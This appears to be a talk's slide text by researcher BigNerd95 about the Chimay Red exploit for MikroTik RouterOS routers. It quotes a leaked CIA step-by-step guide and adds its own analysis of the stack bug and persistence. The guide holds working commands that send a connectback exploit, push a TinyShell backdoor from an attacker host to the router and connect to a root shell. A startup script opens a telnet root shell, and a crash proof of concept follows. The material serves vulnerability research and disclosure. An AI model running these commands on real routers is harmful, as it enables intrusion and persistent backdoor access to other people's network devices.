Chimay Red
Chimay Red
Chimay Red
Tools Revealed
Chimay Red exploit
Persistence exploit
BigNerd95
Chimay Red
“ChimayRed (CR) is an exploit that is used against MikroTik (MT) routers running
RouterOS.
This guide explains how to utilize ChimayRed to upload the TinyShell payload to
the MikroTik router.”
(https://wikileaks.org/ciav7p1/cms/page_16384604.html)
Step-by-step guide
1. Verify that the MikroTik is running RouterOS 6.X
2. Verify python version 2.7 is installed
3. Determine the ICON IP Address
4. Go to ChimayRed bin directory
a. /home/ubuntu/Desktop/ChimayRed_v3.7/bin
5. Exploit RB 493G using ChimayRed.
a. python chimay_red.py -t 172.20.100.6:80 connectback -l 172.20.12.23 -p 4242
6. The following output should be observed, which confirms successfully exploitation:
a. [+] Connecting to: 172.20.100.6:80
b. [+] Detected RouterOS: 6.27
c. [+] Detected architecture: mipsbe
d. [+] 0 seconds until Web server is reset.
e. [+] Web server reset.
f. [+] Connecting to target...
g. [+] Connected.
h. [+] Sending exploit payload...
i. [+] Exploit sent.
7. Make TinyShell executable.
8. Build TinyShell with the following parameters:
a. ./tshpatcher-1.0.4 -p 12345 -k MyPassphrase -m mt-mipsbe -o tshd-mipsbe -s /bin/ash
9. Upload TinyShell.
a. First setup the download_and_exe server on ICON.
b. cd ~/Desktop/ChimayRed_v3.7/bin
c. python tools/download_and_exe_server.py -l 172.20.12.23 -p 4242 -f
~/Desktop/TshPatcher_v1.0.4/tshd-mipsbe
d. Ctrl-Z
e. python chimay_red.py -t 172.20.100.6:80 download_and_exe -l 172.20.12.23 -p 4242 -f /tmp/tshd-mipsbe
f. <Press Enter>
g. fg
h. You should observe the following output:
i. [+] Got connection from 172.20.100.6:37874
j. [+] Sending 42864 bytes...
k. [+] Sent.
10. Connect to MK TinyShell
a. ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase
b. #
Supported RouterOS
All the install log present in the leak are done on versions previous to 6.30.
RouterOS changelog
(https://mikrotik.com/download/changelogs/current-release-tree)
Diaphora
www_6.38.4 vs www_6.38.5
readPostData diff
www_6.38.4 www_6.38.5
What is alloca?
“The alloca() function allocates size bytes of space in the stack frame of the caller.
This temporary space is automatically freed when the function that called alloca() returns to its caller.”
(http://man7.org/linux/man-pages/man3/alloca.3.html)
What really happens?
The content_length_value is subtracted from the stack pointer register.
If we pass a big number bigger than 130000 and smaller than 2147483647 the stack pointer will
point out of the stack, and the first PUSH will generate a SEGFAULT.
If we pass a negative number (or a number from 2147483648 [-2147483648] to 4294967295 [-1]), the
space on the stack won’t be reserved because the stack pointer will be incremented instead of
decremented.
But...the istream::Read function will try to read 4 mld of bytes from the socket and writing them on the
stack, generating a SEGFAULT before returning from function.
Persistence exploit
”place binary in "/flash/bin", and place script in "/flash/etc/rc.d/”
(https://wikileaks.org/ciav7p1/cms/page_28049428.html)
(https://wikileaks.org/ciav7p1/cms/page_50495490.html)
/flash/etc/rc.d/run.d/
https://download2.mikrotik.com/routeros/[ROS_VERSOIN]/mikrotik-[ROS_VERSION].iso
https://download2.mikrotik.com/routeros/6.38.5/mikrotik-6.38.5.iso
https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso
https://download2.mikrotik.com/routeros/6.30/mikrotik-6.30.iso
5. In /etc/rc.d/run.d folder create a bash script called S99own (set execution permissions)
#!/bin/bash
mkdir /ram/mybin
/flash/bin/busybox-i686 --install -s /ram/mybin
export PATH=/ram/mybin:$PATH
telnetd -p 23000 -l bash
#bash # uncomment this line to spawn a root shell in the login screen
6. Unmount disks and shutdown the VM, remove the live iso and boot again.
Debugging
Now you can attach to gdbserver with a debugger at ip 192.168.2.124 and port
5050.
Crash POC
-1 = 4294967295
-2 = 4294967294